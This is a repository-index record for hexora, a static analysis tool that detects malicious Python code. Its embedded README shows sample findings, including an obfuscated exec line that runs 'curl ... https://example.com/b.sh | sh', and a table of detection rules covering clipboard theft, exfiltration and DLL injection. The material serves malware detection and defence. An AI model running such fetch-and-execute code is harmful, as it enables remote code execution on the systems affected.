{"id":30896887,"url":"https://github.com/rushter/hexora","last_synced_at":"2025-12-27T14:44:58.210Z","repository":{"id":310738793,"uuid":"1030990993","full_name":"rushter/hexora","owner":"rushter","description":"Static analysis of malicious Python code","archived":false,"fork":false,"pushed_at":"2025-09-05T17:19:12.000Z","size":171,"stargazers_count":21,"open_issues_count":0,"forks_count":2,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-05T18:42:20.282Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rushter.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-08-02T19:10:44.000Z","updated_at":"2025-09-05T17:19:16.000Z","dependencies_parsed_at":"2025-08-20T00:26:50.718Z","dependency_job_id":"68b83e3d-cea5-4a4e-9812-49f0a8ea3326","html_url":"https://github.com/rushter/hexora","commit_stats":null,"previous_names":["rushter/hexora"],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/rushter/hexora","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/manifests","owner_url":"https:/
/repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rushter","download_url":"https://codeload.github.com/rushter/hexora/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rushter%2Fhexora/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":274231140,"owners_count":25245675,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-08T02:00:09.813Z","response_time":121,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-09-08T23:47:21.550Z","updated_at":"2025-12-27T14:44:58.204Z","avatar_url":"https://github.com/rushter.png","language":"Rust","readme":"# hexora\n\n[![PyPI - Version](https://img.shields.io/pypi/v/hexora?logo=pypi\u0026label=Pypi\u0026logoColor=fff)](https://pypi.org/project/hexora)\n\n\nHexora is a static analysis tool designed to detect malicious and harmful patterns in Python code.\n\nIt can be used to:\n\n- Audit project dependencies to catch potential supply-chain attacks\n- Detect malicious scripts found on platforms like Pastebin, GitHub, or open directories\n- Analyze IoC files from past security incidents\n- Audit new packages uploaded to PyPI\n\n\n\u003cimg width=\"600\" alt=\"Hexora example\" src=\"docs/example.gif\"\u003e\n\n\n# Examples\n\nFor output examples, please see the [docs/examples.md](docs/examples.md) file.\n\n# Installation\n\n## Using Python\n\nRequires 
Python 3.9+.\n\n```bash\npip install hexora\n```\n\nUsing uv:\n```bash\nuv tool install hexora\n```\n\n# Usage\n\n\n```bash\nhexora --help\n```\n\n## Audit single file\n\n```bash\n\u003e  hexora audit test.py\n\nwarning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.\n  ┌─ resources/test/test.py:3:8\n  │\n1 │ import pyperclip\n2 │\n3 │ data = pyperclip.paste()\n  │        ^^^^^^^^^^^^^^^^^ HX2000\n  │\n  = Confidence: High\n    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.\n\nwarning[HX3000]: Possible execution of unwanted code\n   ┌─ resources/test/test.py:20:1\n   │\n19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)\n20 │ _ceil(\"import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])\")\n   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000\n   │\n```\n\n\n## Audit directory\n\n```bash\nhexora audit --output-format terminal resources/test/\n```\n\n\n## Audit packages from virtual environment\n\n```bash\nhexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/\n```\n\nWhere `python3.11` is the Python version used in the virtual environment.\n\nTips:\n\n- Use `--exclude` to suppress certain rule codes (e.g., noisy imports) for a given run\n- Use `--min-confidence` to focus on high-confidence findings only\n\nConfidence indicates how likely it is that a given piece of code is malicious.\nSome libraries or code snippets are used for legit purposes, and it's hard to distinguish legit use-cases from\nmalicious ones.\nThat's why some matches have a low confidence level.\n\nSome rules can have different confidence levels. Avoid filtering a lot of rules by codes unless you are\nvery confident. For example, code and shell execution can have medium, high, and very high confidence.\nThis depends on how the code was executed. 
If we detect an obfuscation attempt, we elevate confidence.\n\nFor example, this code will have a high confidence:\n```\nglobals()[\"__builtins__\"].eval(\"print(123)\")\n```\n\n## Usage in Python\n\n```python\n\u003e\u003e\u003e import hexora\n\u003e\u003e\u003e results = hexora.audit_path(\"/Projects/hexora/resources/test/\")\n\u003e\u003e\u003e len(results)\n15\n\u003e\u003e\u003e results[0]\n{'items': [{'confidence': 'low',\n            'description': 'pyperclip can be used to copy and paste data from '\n                           'the clipboard.',\n            'label': 'pyperclip',\n            'location': (7, 16),\n            'rule': 'HX5010'},\n           {'confidence': 'high',\n            'description': 'Reading from the clipboard can be used to '\n                           'exfiltrate sensitive data.',\n            'label': 'pyperclip.paste',\n            'location': (25, 42),\n            'rule': 'HX2000'}],\n 'path': '/Projects/hexora/resources/test/clipboard_01.py'}\n\u003e\u003e\u003e # Single file audit\n\u003e\u003e\u003e result = hexora.audit_file(\"/Projects/hexora/resources/test/clipboard_01.py\")\n\u003e\u003e\u003e ...\n ```\n\n## Available rules\n\nNew rules are added regularly.\n\nRight now, the following rules are available:\n| Code | Name | Description |\n|---|---|---|\n| HX1000 | AppEnumeration | Suspicious application enumeration. |\n| HX1010 | BrowserEnumeration | Suspicious browser enumeration (apps, cookies, history, etc.). |\n| HX1020 | PathEnumeration | Suspicious path enumeration. |\n| HX1030 | OSFingerprint | Suspicious OS fingerprinting. |\n| HX2000 | ClipboardRead | Reading from the clipboard. |\n| HX2010 | EnvAccess | Access to a sensitive environment variable. |\n| HX3000 | CodeExec | Possible code execution. |\n| HX3010 | ShellExec | Execution of a shell command. |\n| HX3040 | DLLInjection | Possible DLL injection. |\n| HX3050 | DangerousExec | Execution of potentially dangerous command inside a shell command. 
|\n| HX3060 | SuspiciousCall | Suspicious function call. |\n| HX4000 | ObfuscatedShellExec | Execution of an obfuscated shell command. |\n| HX4010 | ObfuscatedCodeExec | Execution of obfuscated code. |\n| HX5000 | DunderImport | Suspicious use of `__import__`. |\n| HX5010 | SuspiciousImport | Suspicious import. |\n| HX5020 | CtypesImport | Suspicious ctypes import. |\n| HX5030 | PickleImport | Suspicious pickle import. |\n| HX5040 | StructImport | Suspicious struct import. |\n| HX5050 | SocketImport | Suspicious socket import. |\n| HX5060 | MarshalImport | Suspicious marshal import. |\n| HX6000 | Base64String | Long Base64-encoded string detected; possible code obfuscation. |\n| HX6010 | HexedLiterals | List of hex-encoded literals detected; possible payload. |\n| HX6020 | HexedString | Long hex-encoded string detected; possible payload. |\n| HX6030 | IntLiterals | Large list of integer literals detected; possible code obfuscation. |\n| HX6040 | CVEInLiteral | Literal contains a CVE identifier. |\n| HX6050 | SuspiciousLiteral | Suspicious literal detected; possible data enumeration. |\n| HX6060 | PathTraversal | Suspicious path traversal. |\n| HX6070 | BrowserExtension | Enumeration of sensitive browser extensions. |\n| HX6080 | WebHook | Suspicious webhook detected. Possible data exfiltration. |\n| HX7000 | SuspiciousFunctionName | Suspicious function name. |\n| HX7010 | SuspiciousParameterName | Suspicious parameter name. |\n| HX7020 | SuspiciousVariable | Suspicious variable name. |\n| HX9000 | DataExfiltration | Potential data exfiltration. |\n| HX8000 | BinaryDownload | Suspicious binary download. |\n| HX8010 | BuiltinsVariable | Suspicious builtin variable usage. |\n| HX8020 | SuspiciousComment | Suspicious comment. |\n| HX8030 | SuspiciousWrite | Suspicious write to the filesystem. 
|\n\n## Credits\n\nFor parsing, we use the AST parser from the [ruff](https://github.com/astral-sh/ruff/tree/main) library.\n","funding_links":[],"categories":["Utilities"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frushter%2Fhexora","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frushter%2Fhexora","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frushter%2Fhexora/lists"}